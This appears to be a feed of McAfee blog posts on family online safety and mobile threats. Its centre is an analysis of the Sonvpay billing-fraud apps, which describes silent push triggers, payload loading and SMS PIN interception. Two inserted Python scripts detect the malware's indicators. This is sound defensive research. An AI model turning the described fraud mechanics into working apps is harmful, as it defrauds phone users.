  • The pattern of behavior must show an “increased priority given to gaming” to the point that gaming “takes precedence over other interests and daily activities.”
  • A “continuation or escalation of gaming despite the occurrence of negative consequences,” or behavior that affects one’s relationships, education, or occupation.

So what can you do if you recognize even one of the warning signs above? Plenty. It’s never too late to make changes in your family. All you need is knowledge, action, and some mad follow-through skills.

5 Ways to Help Kids Balance Gaming

Set and enforce time limits. Start setting technology time limits when your kids are young. If your kids are older, don’t shy away from announcing new house rules starting today. Yes, kids may complain, but experts agree: Rules help kids feel loved and safe. Parental control software will help you set time limits on your child’s device usage and help minimize exposure to potentially malicious or inappropriate websites. Another tip: Set a timer on your smartphone or go old school and crank up that kitchen timer. Take it from this regret-filled mom: Time limits will make every difference in helping kids find balance.

Be a role model. You can’t tell your kids they have to get off of Call of Duty then spend the next eight hours constructing high-scoring word combos on Words with Friends. Model smart tech use and moderation. Even place that kitchen timer next to you if you need it.

Roll up your sleeves — get gaming. Jump into the game with your kids so you can better understand the content, the community, and the messages coming into your home. Get a glimpse into the appeal of the game for your child and the skills needed to advance. Once you have this perspective, you will intuitively know how to monitor your child’s time on specific games. This is also a great opportunity to share your values on certain topics or narratives addressed in games.

Stay safe while gaming. Gaming’s purpose is fun, so it’s rare that a child or even a parent is focused too much on safety when kids log on to play. Still, there are safety risks. A recent McAfee survey found that parents are concerned with issues connected to gaming such as sexual predators, data risks, inappropriate content, and bullying, but few take steps to remedy those concerns. Several products such as McAfee Total Protection can help keep connected devices safe from malware and McAfee WebAdvisor can help you avoid dangerous websites and links.

Don’t overreact. It’s easy to fear what we don’t understand. True video game addiction is rare. The WHO’s new classification isn’t describing the average gamer who spends a few hours a day gaming with friends. The designation targets serious gaming habits that destroy people’s lives, such as neglecting hygiene and nutrition, rejecting loved ones, staying up all night, and losing jobs due to gaming. The more you understand about your child’s favorite games, the better parenting decisions you will be able to make.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Report: Gaming Addiction is a Real Thing. So What Can Parents Do Next? appeared first on McAfee Blogs.

Cybercrime in the Spotlight: How Crooks Capitalize on Cultural Events

Every four years, everyone’s head around the globe turns toward the television. The Olympics, the World Cup – world events like these have all eyes viewing friendly competition between nations. Operating under such a big spotlight, these events have been heavily guarded by physical security to ensure no participants or attendees are harmed. But what about digital security? In 2018, many aspects of these events have become digitized, which is great for event organizers and viewers, but also for cybercriminals. In fact, reports are already circulating that hackers are targeting attendees of this year’s 2018 FIFA World Cup.

Why These Events?

The cultural value placed in these international games is precisely the reason cybercriminals target them. The more something is valued, the more people are willing to make sacrifices for it. Cybercriminals know that, and hope to capitalize on it.

In cases like the World Cup, fans may be willing to expose themselves to a more hostile environment in order to feel a part of the event. The same goes for companies that are associated with the sporting events, as they can fall victims to attacks just as individuals do.

Types of Attacks

Both innocent tourists and fans at home may have to deal with threats that result from their involvement in these events. Given that internet access has increased all over the world, many tourists are vulnerable to rogue access-point attacks in public places. Attackers can use these access points to harvest credentials and gain access to a victim’s device and accounts. Malware can also be placed within ATMs, ready to rip off tourists withdrawing currency from their banks. As for fans at home, many phishing and watering-hole attacks have been designed around these events to entice fans to visit malicious sites or open emails that appear to be related to the games.

However, for nation-state attacks, a lot of groundwork is done before these global events even begin. Our McAfee Labs team saw this firsthand in the period leading up to the Pyeongchang 2018 Olympic Winter Games. A nation-state hacker pretended to be a supplier to the Olympics and sent out weaponized mail to organizations of interest that contained malware developed well before the event had started.

The Implications

Whether the objective behind the threat is disruption or financial gain, these attacks all do have one thing in common — they impact the overall feeling of safety at these events and take away from what is supposed to feel like a worldwide celebration of sport.

Now, when fans wish to be part of a big event such as the World Cup, they can no longer just focus on which jersey they’re wearing that day. They have to worry about their bank accounts being robbed or about being extorted. Beyond the individual implications, the nation-state attacks that take place at these events can rear their head in an ugly way, as they can actually worsen international relations much more than a healthy sporting rivalry ever could.

So the question is – now what? On an individual level, visitors to these events must maintain overall good digital security hygiene. This means leaving unnecessary devices at home, enabling two-factor authentication, using a VPN service, and overall remaining alert and vigilant for scams.

Beyond that, we must all recognize that our physical and digital lives are converging at a fast pace, and we now have a large digital attack surface that is not yet properly safeguarded. And with both cybercriminals and nation-state actors showing such a heightened interest in global cultural events, cybersecurity must become an essential part of organizing such an event. Only then can countries host a successful and safe sporting event for everyone.

To learn more about what McAfee is doing to help face the threats to these events, be sure to follow us at @McAfee and @McAfee_Labs.

The post Cybercrime in the Spotlight: How Crooks Capitalize on Cultural Events appeared first on McAfee Blogs.

What Parents Need to Know About the Popular App Mappen

Kids love their apps but in their excitement to download the new ones, app safety often falls straight off their radar. One of those new, fun, not-so-safe apps is Mappen.

Kids, pre-teens specifically, are jumping on Mappen to connect with friends nearby and, as the app’s tagline encourages, “Make Things Happen.” The location-based app allows friends to see each other’s location, what they are doing, and make it easy to meet up. Sounds like fun except for the fact that the app is brimming with potential security flaws.

How It Works

Anyone who downloads the Mappen app can send a friend request to anyone else and begin sharing his or her location (and data) immediately. While on Mappen, friends can share updates and photos much like any other social network. Personal data that can be shared: names, birthdates, location, likes, dislikes, photos, and friend lists.

Once a user installs the app, he or she is asked to turn on location services, which must remain on to share location, see others, and post content updates. The app also asks to access a user’s full contact list before it can be used.

The Risks

While many location-based apps exist now, Mappen specifically targets tweens. Mappen’s privacy policy states clearly that it collects and shares data, which presents a privacy risk to minors who use the app.

Likewise, the location requirement to use the app poses a safety risk. This feature means anyone on your child’s friend list can see your child’s location at any time. As your child’s Mappen circle grows, so too might the chance of your child sharing his or her location and personal information with an unsafe “friend.”

Tips to Help Boost App Safety

Stay connected with your kids. The greatest risk to your child’s online safety is a strained relationship. Every family dynamic and circumstance varies, but consider doing all you can to make your relationship with your child a priority. When communication and trust are strong with your child, you will better know what’s going on in his or her life, who their friends are, and if there’s a situation in which they might need help.

Monitor apps! The best way to know which apps your kids use and how they use them is to routinely monitor their phones. How do you do this? You do this physically and with technology. About once a week, look at your child’s phone and laptop or tablet (preferably with your son or daughter next to you), look at the display screen, examine the app icons, and ask questions. If you don’t recognize an app, click it open, or ask questions. Also, if there’s an app icon you click that asks for a password, it may be a vault app that requires a few more clicks or a conversation. Another way to monitor apps is using technology such as filtering software that will help you filter and track the content that comes into your home via your child’s devices.

Do your research, stay aware. Stay on top of trends in apps by reading this and other technology or family blogs. New apps come out all the time, and word-of-mouth among teens spreads quickly. One of the best ways to keep your kids safe online is to understand where they connect online and what risks those digital spaces may present. Potential risks that some apps may carry include privacy infringements, cyberbullying, pornography, phishing scams, malware, predators, and sex-related crimes.

Turn off location. Mappen, as well as other apps such as Facebook, Kik, and Snapchat, access a user’s location while using the app and even when the app is not in use. To ensure your location isn’t shared randomly, turn off location when apps are not in use. Depending on the age of your child, you may consider not allowing the use of location-based apps at all.

Say NO to random friend requests. It’s easy for criminals to create a fake profile and gain access into your child’s life. An attractive peer from a nearby town who wants to “connect” may be a catfish using another person’s identity or a predator looking to groom a vulnerable tween or teen.

Guard your child’s privacy. When your child shares personal information through an unsafe app, it opens them up, and it opens up your entire family, to risk. Often kids get comfortable online and forget — or don’t fully understand — the problem with sharing personal details. Review the importance of keeping details such as full name, school, birthdates, address, personal photos, and other family information private.

The post What Parents Need to Know About the Popular App Mappen appeared first on McAfee Blogs.

AsiaHitGroup Returns With New Billing-Fraud Campaign

Are you tired yet of the music track “Despacito”? If you downloaded this ringtone app from Google Play, chances are your answer is a resounding Yes. But it gets worse: The McAfee Mobile Research team recently found 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. The ringtone app was one of them; together the apps were downloaded 50,000 times from the official app store, and all of them were designed to steal money from their victims. The AsiaHitGroup Gang has been active since at least 2016, attempting to charge 20,000 victims for the download of popular mobile applications containing the fake-installer app Sonvpay.A. For more analysis, see the Mobile Research team’s post.

Ordinarily we advise users to review the requested permissions before installing a mobile app, and normally this is enough. In this case, the only permission requested was access to SMS messages, and once installed the app behaved as expected. In the background, however, Sonvpay silently used the push notification service to subscribe users to premium-rate services.

This campaign displays a significant level of customization. The criminals can tailor their fraud to the country of their choosing. In our analysis we looked at mobile billing fraud targeting users in Kazakhstan, Malaysia, and Russia. In Kazakhstan victims are subscribed to a premium-rate service whereas in Malaysia and Russia they are connected to a WAP billing service. Further, the criminals recognize that in Malaysia the mobile operator sends a PIN code, so the attackers include functionality to intercept the SMS. Once intercepted, the app communicates with the mobile operator to subscribe to the service.

This group began targeting users in Asia, but the move to Russia shows its increasing ambition. The goal of the AsiaHitGroup Gang remains the same, but the manner in which they attempt to achieve their ends differs per campaign, and their techniques are improving. Although the security industry focuses much attention on “loud” and destructive attacks, many campaigns quietly steal funds from unsuspecting victims or those who have little visibility into what is happening.

The post AsiaHitGroup Returns With New Billing-Fraud Campaign appeared first on McAfee Blogs.

AsiaHitGroup Gang Again Sneaks Billing-Fraud Apps Onto Google Play

The McAfee Mobile Research team has found a new billing-fraud campaign of at least 15 apps published in 2018 on Google Play. Toll fraud (which includes WAP billing fraud) is a leading category of potentially harmful apps on Google Play, according to the report Android Security 2017 Year in Review. This new campaign demonstrates that cybercriminals keep finding new ways to steal money from victims using apps on official stores such as Google Play.

The AsiaHitGroup Gang has been active since at least late 2016 with the distribution of the fake-installer application Sonvpay.A, which attempted to charge at least 20,000 victims, primarily from Thailand and Malaysia, for the download of copies of popular applications. One year later, in November 2017, a new campaign, Sonvpay.B, was discovered on Google Play; it used IP address geolocation to confirm the country of the victim and added Russian victims to the WAP billing fraud to increase its potential to steal money from unsuspecting users.

In January 2018, the AsiaHitGroup Gang returned to Google Play with the repackaged app, Sonvpay.C, which uses silent background push notifications to trigger a fake update dialog. When victims start the “update” they instead subscribe to a premium-rate service. The subscription operates primarily via WAP billing, which does not require sending SMS messages to premium-rate numbers. Instead it requires only that users employ the mobile network to access a specific website and automatically click on a button to initiate the subscription process. Based on the approximate number of installations from Google Play, the cost of the premium-service subscription, and the days that these apps were available, we estimate that the AsiaHitGroup Gang could have potentially earned between $60,500–$145,000 since January.

Sonvpay on Google Play

The McAfee Mobile Research team initially found the following applications repackaged with Sonvpay on Google Play, all of them published this year:

Figure 1. Sonvpay apps found on Google Play.

We notified Google about these apps on April 10 and they were promptly removed. A couple of days later the app “Despacito for Ringtone” was found again on the store and was quickly removed. In total we found 15 apps that were installed at least 50,000 times since the first one, Cut Ringtones 2018, was released on Google Play in January 2018. The following table lists the 15 malicious apps:

At the time of download, the only red flag that a user could notice is that the app needs access to SMS messages. Once installed and executed, the app behaves as expected (QR code reader, ring tones, etc.). However, in the background and without the user’s knowledge, Sonvpay listens for incoming push notifications that contain the data to perform mobile billing fraud.

Background Push Notification and Fake Update Screen

Sonvpay employs the OneSignal push notification service to get the information to subscribe users to premium-rate services. To receive the data in the background without displaying a notification, Sonvpay implements the method “onNotificationProcessing” and returns “true” to make the notification silent:

Figure 2. Silent background notification.

The received data carries the parameters for WAP and SMS fraud along with the information necessary to display a fake update notification to the user after some time of using the repackaged application. This fake notification has only one bogus button. If the user scrolls to the end, the misleading phrase “Click Skip is to agree” appears:

Figure 3. Fake update notification.

If the user clicks the only button, Sonvpay will do its job. However, even if there is no interaction with this window, Sonvpay will still proceed to subscribe to a premium-rate service if the “price” value in the push notification is empty:

Figure 4. Starting mobile billing fraud if “price” value is empty.

Downloading the Dynamic Payload from a Remote Server

One of the parameters obtained from the silent push notification is a URL to request the location of functionality to perform mobile billing fraud. Once the fake update notification is displayed, Sonvpay requests the download of the library from another remote server:

Figure 5. Sonvpay requesting library with additional functionality.

The new APK file is downloaded and stored in the path /sdcard/Android/<package_name>/cache/ so that it can be dynamically loaded and executed at runtime. The library we obtained for performing mobile billing fraud targeted only Kazakhstan and Malaysia but, because the library is present in a remote server and can be dynamically loaded, it can likely be updated at any time to target more countries or mobile operators.

WAP Billing and SMS Fraud

In the case of Kazakhstan, Sonvpay loads a specific URL delivered through the silent push notification and uses JavaScript to click on a button and on the element “activate” to fraudulently subscribe the user to a premium-rate service:

Figure 6. WAP billing fraud in Kazakhstan.

For Malaysia, the malware creates a new WebView to send the “Shortcode” and “Keyword” parameters to a specific URL to subscribe the user to a WAP billing service:

Figure 7. WAP billing fraud in Malaysia.

However, for Malaysia the app needs to intercept a confirmation code (PIN) sent by the mobile operator via SMS. Sonvpay has this SMS interception functionality implemented in the original repackaged application:

Figure 8. Processing an intercepted SMS message to get the confirmation PIN.

Once the PIN is obtained, it is sent to the mobile operator via a web request to automatically confirm the subscription. If the parameters for Kazakhstan or Malaysia do not match, Sonvpay still tries to perform mobile billing fraud by attempting to send an SMS message to a premium-rate number provided via the silent push notification:

Figure 9. Functionality to send an SMS message to a premium-rate number.
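The three traits described above (SMS access as the only visible red flag at install time, a second APK pulled from a remote server and loaded from the external cache path, and interception of the operator’s PIN over SMS) are all things an analyst can check statically before running a sample. The following triage script is an added example in my own Python, not McAfee’s tooling or the Sonvpay code: it parses a manifest for SMS permissions and an SMS_RECEIVED receiver, then scans a list of decompiled references for the OneSignal hook, DexClassLoader, SmsManager and the /sdcard/Android/<package_name>/cache/ staging path. The manifest and the reference list are constructed for the example; the high-priority-receiver check is my heuristic (a receiver with a high priority sees the SMS before the messaging app and can abort the broadcast), since the post only states that the PIN is intercepted.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest fragment in the style of a repackaged ringtone app.
# Made up for the example; not taken from any real Sonvpay sample.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.ringtones">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:label="Ringtones">
    <receiver android:name=".SmsReceiver" android:exported="true">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed list of references as a decompiler would list them. The OneSignal method and
# DexClassLoader are the hooks the post describes; the cache path follows the
# /sdcard/Android/<package_name>/cache/ pattern it mentions. The package name is invented.
SAMPLE_REFS = [
    "Lcom/onesignal/NotificationExtenderService;->onNotificationProcessing",
    "Ldalvik/system/DexClassLoader;-><init>",
    "Landroid/telephony/SmsManager;->sendTextMessage",
    "Landroid/webkit/WebView;->loadUrl",
    "/sdcard/Android/com.example.ringtones/cache/",
]

SMS_READ_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Substrings that identify each capability in the reference list.
CODE_MARKERS = {
    "silent_push": "->onNotificationProcessing",
    "dynamic_loading": "Ldalvik/system/DexClassLoader;",
    "sms_send": "Landroid/telephony/SmsManager;->sendTextMessage",
    "external_cache": "/sdcard/Android/",
}
DESCRIPTIONS = {
    "silent_push": "handles push notifications silently (onNotificationProcessing)",
    "dynamic_loading": "loads code at runtime with DexClassLoader",
    "sms_send": "can send SMS to arbitrary numbers (SmsManager.sendTextMessage)",
    "external_cache": "references an external cache path used to stage downloaded code",
}


def manifest_indicators(xml_text):
    """Declared permissions plus the priority of any SMS_RECEIVED receiver (None if absent)."""
    root = ET.fromstring(xml_text)
    perms = {p.get(ANDROID + "name") for p in root.iter("uses-permission")}
    priority = None
    for flt in root.iter("intent-filter"):
        if any(a.get(ANDROID + "name") == SMS_RECEIVED for a in flt.iter("action")):
            priority = int(flt.get(ANDROID + "priority", "0"))
    return {"permissions": perms, "sms_receiver_priority": priority}


def code_indicators(refs):
    """Which CODE_MARKERS appear anywhere in the reference list."""
    return {tag for tag, marker in CODE_MARKERS.items() if any(marker in r for r in refs)}


def triage(xml_text, refs):
    """Combine manifest and code evidence into a verdict and the reasons behind it."""
    m = manifest_indicators(xml_text)
    reasons = []
    if m["permissions"] & SMS_READ_PERMS:
        reasons.append("reads incoming SMS (can capture an operator confirmation PIN)")
    if m["sms_receiver_priority"] is not None and m["sms_receiver_priority"] >= 500:
        reasons.append("high-priority SMS_RECEIVED receiver (sees the PIN before the messaging app)")
    for tag in sorted(code_indicators(refs)):
        reasons.append(DESCRIPTIONS[tag])
    # Threshold is a judgement call for the example: one trait alone is common in benign apps.
    verdict = "suspicious" if len(reasons) >= 3 else "needs review"
    return verdict, reasons


if __name__ == "__main__":
    verdict, reasons = triage(SAMPLE_MANIFEST, SAMPLE_REFS)
    print(verdict)
    for r in reasons:
        print(" -", r)
```

Feed it the manifest from apktool and the method references from a decompiler listing; an SMS-reading ringtone app that also loads code from the external cache is exactly the combination that should go to dynamic analysis rather than straight to the store.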

A Closer Look at Previous Campaigns

While looking for patterns in the 2018 campaign, we found the app DJ Mixer–Music Mixer. As soon as this application executes, it checks if the device has an Internet connection. If the device is offline, the app shows the error message “You connect to internet to continue” and ends its execution. If the device is online, the app executes a web request to a specific URL:

Figure 10. Web request to the AsiaHitGroup Gang URL.

We learned the apps created by the developer SHINY Team 2017 were available on Google Play in September 2017; earlier Sonvpay variants were discovered in November 2017. The primary behavior of the two variants is almost the same—including the changing of the main icon and the app’s name to Download Manager to hide its presence from the user. However, with DJ Mixer, the geolocation of the IP address identifies the country of the infected device and aids the execution of the mobile billing fraud:

Figure 11. Using IP geolocation to target specific countries.

In this case only three countries are targeted via the geolocation service: Russia (RU), Thailand (TH), and Malaysia (MY). If the IP address of the infected device is not from any of these countries, a dialog will claim the app is not active and that the user needs to uninstall and update to the latest version.

If the country is Thailand or Malaysia, the malicious app randomly selects a keyword, which determines the image used to offer the user a premium-rate service. With Malaysia the image includes English text with terms of service and the button “Subscribe” to accept the randomly selected premium-rate service:

Figure 12. Screens displayed when the country of the IP address is Malaysia.

In the case of Thailand, the text is in Thai and includes a small version of terms of service along with instructions to unsubscribe and stop the charges:

Figure 13. Screens shown when the country of the IP address is Thailand.

Finally, with Russia no image is shown to the user. The app fraudulently charges the user via WAP billing while enabling 3G and disabling Wi-Fi:

Figure 14. Forcing the use of 3G to start WAP billing fraud.

We also found similar apps from late 2016 that performed SMS fraud by pretending to be legitimate popular applications and asking the user to pay for them. The text is similar to the fake update message seen in the 2018 campaign, but here it is labeled “Term of user”:

Figure 15. Fake-installer behavior asking the user to pay for a popular legitimate app.

If the user clicks “No,” the app executes as expected. However, if the user clicks “Yes,” the app subscribes the user to a premium-rate service by sending an SMS message with a specific keyword to a short number. Next the mobile operator sends the device a PIN via SMS; the malware intercepts the PIN and returns it via web request to confirm the subscription.

Once the user is fraudulently subscribed to a premium-rate service to download a copy of a free app on official app stores, the malware shows the dialog “Downloading game…” and proceeds with the download of another APK stored on a third-party server. Although the APK file that we downloaded from the remote server is a copy of the legitimate popular app, the file can be changed at any point to deliver additional malware.

Unlike in previous campaigns, we did not find evidence that these fake-installer apps were distributed via Google Play. We believe that they were distributed via fake third-party markets from which users looking for popular apps are tricked into downloading APK files from unknown sources. In June 2018 ESET and Sophos found a new version of this variant pretending to be the popular game Fortnite. The fake game was distributed via a YouTube video that asked the user to download the fake app from a specific URL. This recent campaign shows that the cybercriminals behind this threat are still actively tricking users into installing these fake applications.

Connections Among Campaigns

All of these campaigns rely on billing-fraud apps targeting users in Southeast and Central Asia and offer some similarities in behavior such as the use of almost the same text and images to trick users into subscribing to premium-rate services. Other potential connections among the three campaigns suggest that all the apps are likely from the same actor group. For example, apps from all campaigns use the same string as debug log tag:

Figure 16. The “SonLv” string used as a log tag occurs in all campaigns.

There is also a notable similarity in package and class names and in the use of a common framework (telpoo.frame) to perform typical tasks such as database, networking, and interface support:

Figure 17. Common package and class names in all campaigns.

Finally, apps from the Google Play campaigns use the domain vilandsoft[.]com to check for updates. The same domain is also used by apps from the fake-installer campaign to deliver remote-execution commands, for example, action_sendsms:

Figure 18. A fake-installer app checking for the command action_sendsms.
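The shared artifacts just listed (the SonLv log tag, the telpoo.frame package, the vilandsoft[.]com domain and the action_sendsms command) are exactly the kind of strings a triage script can look for. The following is an added example, not McAfee's tooling: it unpacks an APK in memory, searches every entry for those strings and flags SMS permissions in the manifest; the permission list, the verdict thresholds and the constructed sample APK are assumptions made for this demo, not facts from the analysis.

```python
"""Triage helper for the shared Sonvpay / AsiaHitGroup artifacts.

Added example, not McAfee's tooling. The indicator strings come from the
analysis above (log tag "SonLv", framework package telpoo.frame, update
and command domain vilandsoft[.]com, command "action_sendsms"). The SMS
permission list, the verdict thresholds and the in-memory sample APK are
assumptions made for this demo.
"""
import io
import re
import zipfile

# Family strings reported across all three campaigns. The package is
# matched in both dotted (string constant) and slashed (dex descriptor)
# form.
FAMILY_INDICATORS = [
    (rb"\bSonLv\b", "SonLv debug log tag"),
    (rb"telpoo[./]frame", "telpoo.frame framework package"),
    (rb"vilandsoft\.com", "vilandsoft.com update/command domain"),
    (rb"action_sendsms", "action_sendsms remote command"),
]

# Permissions a premium-SMS or PIN-interception payload needs (assumption).
RISKY_PERMISSIONS = {
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
}


def scan_apk(apk_bytes: bytes) -> dict:
    """Return the family indicators and risky permissions found in an APK.

    Every archive entry is searched for the raw strings, so dex files,
    assets and any bundled secondary APK are all covered. The permission
    pass works on a plain-text manifest; a real APK ships a binary-XML
    manifest that must first be decoded (for example with apktool or
    androguard), so treat that part as best-effort.
    """
    indicators = {}
    permissions = set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            for pattern, meaning in FAMILY_INDICATORS:
                if re.search(pattern, data):
                    indicators.setdefault(meaning, []).append(name)
            if name == "AndroidManifest.xml":
                for m in re.finditer(rb"android\.permission\.[A-Z_]+", data):
                    permissions.add(m.group(0).decode())
    return {"indicators": indicators,
            "permissions": permissions & RISKY_PERMISSIONS}


def verdict(result: dict) -> str:
    """Two or more family strings: strong match. One string plus SMS
    permissions: worth a manual look. Thresholds are an assumption."""
    hits = len(result["indicators"])
    if hits >= 2:
        return "match: Sonvpay-family indicators present"
    if hits == 1 and result["permissions"]:
        return "suspicious: one family indicator plus SMS permissions"
    return "no family indicators"


def build_sample_apk(with_indicators: bool) -> bytes:
    """Construct a minimal fake APK (a zip) in memory for the demo.

    The manifest is plain text here for readability; the dex entry is a
    fake header followed by the kind of strings a dex string table holds.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "AndroidManifest.xml",
            '<manifest>'
            '<uses-permission android:name="android.permission.SEND_SMS"/>'
            '<uses-permission android:name="android.permission.RECEIVE_SMS"/>'
            '</manifest>',
        )
        dex = b"dex\n035\x00" + b"\x00" * 16
        if with_indicators:
            dex += (b"Ltelpoo/frame/net/HttpHelper;\x00SonLv\x00"
                    b"http://vilandsoft.com/\x00action_sendsms\x00")
        else:
            dex += b"Lcom/example/clean/MainActivity;\x00"
        zf.writestr("classes.dex", dex)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        result = scan_apk(build_sample_apk(flag))
        print(verdict(result), sorted(result["indicators"]),
              sorted(result["permissions"]))
```

Run against a real sample, the dex hits alone are meaningful; the permission pass needs a decoded manifest, which is why the verdict only uses permissions as a tie-breaker for a single string hit.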

The following timeline identifies the campaigns we have found from this group, strategies to trick users into installing the apps, distribution methods, main payload, and targeted countries:

Figure 19. A timeline of Sonvpay campaigns.

Conclusion

Sonvpay campaigns are one example of how cybercriminals like the AsiaHitGroup Gang constantly adapt their tactics to trick users into subscribing to premium-rate services and boosting their profits. The campaigns started in late 2016 with very simple fake installers that charged users for copies of popular apps. In late 2017, Google Play apps abused WAP-billing services and used IP address geolocation to target specific countries. In 2018, Google Play apps used silent background push notifications to trigger the display of a fake update message and to gather data for mobile billing fraud. We expect that cybercriminals will continue to develop and distribute new billing fraud campaigns to target more countries and affect more users around the world.

Cybercriminals always follow the money, and one of the most effective ways to steal money from users is via billing fraud. A victim will likely not notice a fraudulent charge, for example, until it appears on the mobile bill at the end of the month. Even when the payment is detected early, most of the time the charge is for a subscription rather than a one-time payment. Thus victims will need to find a way to unsubscribe from the premium-rate service, which may not be easy if the subscription occurred silently or if the app does not provide that information. Also, the fact that WAP-billing fraud does not require sending an SMS message to a premium-rate number makes it easier to commit. Cybercriminals need to only silently subscribe users by forcing them to load the WAP-billing service page and click on buttons. For these reasons we expect that mobile billing fraud will continue to target Android users.

McAfee Mobile Security detects this threat as Android/Sonvpay. To protect yourself from this and similar threats, employ security software on your mobile devices, check user reviews for apps on Google Play, and do not accept or trust apps that ask for payment via SMS messages as soon as the app is opened or without any interaction.

The post AsiaHitGroup Gang Again Sneaks Billing-Fraud Apps Onto Google Play appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks

In the McAfee Labs Threats Report June 2018, published today, we share investigative research and threat statistics gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q1 of this year. We have observed that although overall new malware has declined by 31% since the previous quarter, bad actors are working relentlessly to develop new technologies and tactics that evade many security defenses.

These are the key campaigns we cover in this report.

  • Deeper investigations reveal that the attack targeting organizations involved in the Pyeongchang Winter Olympics in South Korea used not just one PowerShell implant script, but multiple implants, including Gold Dragon, which established persistence to engage in reconnaissance and enable continued data exfiltration.
  • The infamous global cybercrime ring known as Lazarus has resurfaced. We discovered that the group has launched the Bitcoin-stealing phishing campaign “HaoBao,” which targets the financial sector and Bitcoin users.
  • We are also seeing the emergence of a complex, multisector campaign dubbed Operation GhostSecret, which uses many data-gathering implants. We expect to see an escalation of these attacks in the near future.

Here are some additional findings and insights:

  • Ransomware drops: New ransomware attacks took a significant dive (-32%), largely as a result of an 81% drop in Android lockscreen malware.
  • Cryptojacking makes a comeback: Attackers targeting cryptocurrencies may be moving from ransomware to coin miner malware, which hijacks systems to mine for cryptocurrencies and increase their profits. New coin miner malware jumped an astronomical 1,189% in Q1.
  • LNK outpaces PowerShell: Cybercriminals are increasingly using LNK shortcuts to surreptitiously deliver malware. New PowerShell malware dropped 77% in Q1, while attacks leveraging Microsoft Windows LNK shortcut files jumped 24%.
  • Incidents go global: Overall security incidents rose 41% in Q1, with incidents hitting multiple regions showing the biggest increase, at 67%, and the Americas showing the next largest increase, at 40%.

Get all the details by reading the McAfee Labs Threats Report, June 2018.

The post ‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks appeared first on McAfee Blogs.

Summer Refresh: Take Time to Relax but Not on Password Security

With summer comes permission to relax a little more, sun a little more, and fun a little more. But, as Newton’s Third Law reminds us, for every action, there is an equal and opposite reaction. Apply that principle to online safety and it might read like this: Each time you relax your family’s digital security a little, there’s a hacker nearby who will step up his or her schemes accordingly.

If your summer routine includes more traveling, online gaming, or time for social connecting, your first line of digital defense is strong, unhackable passwords.

Now is a great time to pump up those passwords to make sure your summer playlist streams seamlessly and summer goes off without a hitch. (Note: If you feel confident in your password strength, type your email address into the site Have I Been Pwned? to see if your passwords have been compromised.)

5 Tips to Pump Up Your Password Strength

  1. Think strength. It’s never too late to put serious thought into creating strong passwords. Begin today. Visualize your password as a superhero. Because of their strength, superheroes like Hulk, Thor, or Optimus Prime can handily protect the world. Strip them of their strength, and each warrior becomes an average Joe vulnerable to the elements of evil. Strength is inherent to password power. Infuse your password with superhero strength by including numbers, lowercase and uppercase letters, and symbols. The more complex your password is, the more difficult it will be for a crook to crack (it’s okay to add a personal touch to your password). A few examples of a secure password might be: myDogisCr@yCr@y!!, Ilov3Gummi3B3ars!! or $oundOfMu$ic_1965.
  2. Get a password manager. If you are driving yourself crazy trying to wrangle a million passwords, a password manager will do the remembering for you. A powerful password manager will: generate random passwords that are difficult to guess, require Multi-Factor Authentication (MFA), and auto-save and securely enter your passwords on frequented sites.
  3. Use unique passwords and MFA. If taken seriously, these two extra steps could save you a million headaches. 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if you are hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication). MFA confirms a user’s identity only after the user presents two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.
  4. Pay attention and take action. It might be summer, but if you snooze, you will lose — privacy in this case. Be sure to pay attention to the news and know if a data breach affects your family. According to the Identity Theft Resource Center® (ITRC), the number of U.S. data breach incidents in 2017 hit a new record high, rising a drastic 44.7 percent over 2016. Popular sites such as Facebook, Netflix, and Twitter have experienced breaches that might easily have affected you or a member of your family.
  5. Connect carefully. So you’ve done everything you can to create strong passwords and that’s awesome! What you can’t control is how others protect your account data, which often includes passwords. Make sure that websites, platforms, and companies that have access to your sensitive information take security seriously and have privacy and security plans in place. Google the company before you establish an account to see if it has had a data breach.

What are the potential consequences of a weak password? A determined hacker can track a person’s online activity, identify and hack weak passwords then use those weak passwords to access banking information, credit card numbers, and personal data used to steal a person’s identity. Remember: Just as you go to work each morning to put food on the table for your family, a hacker has similar goals. So, work with equal diligence to protect what’s yours.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Summer Refresh: Take Time to Relax but Not on Password Security appeared first on McAfee Blogs.

Teens, Gaming and Risk

How Are Your Kids Navigating the Dangers?

It’s no secret that our generation of digital natives love their gaming. Whether it’s on their smartphones, laptops or their dedicated gaming consoles – it’s quite mind boggling just how much gaming they can squeeze into their day-to-day lives!

Well, new research by McAfee shows exactly how much time our Aussie kids are spending working on their latest gaming quest – up to a whopping 4 hours a day! And while we would love them to be directing this time to homework, my bigger concern is around the risks.

Gaming Is Not All Bad News

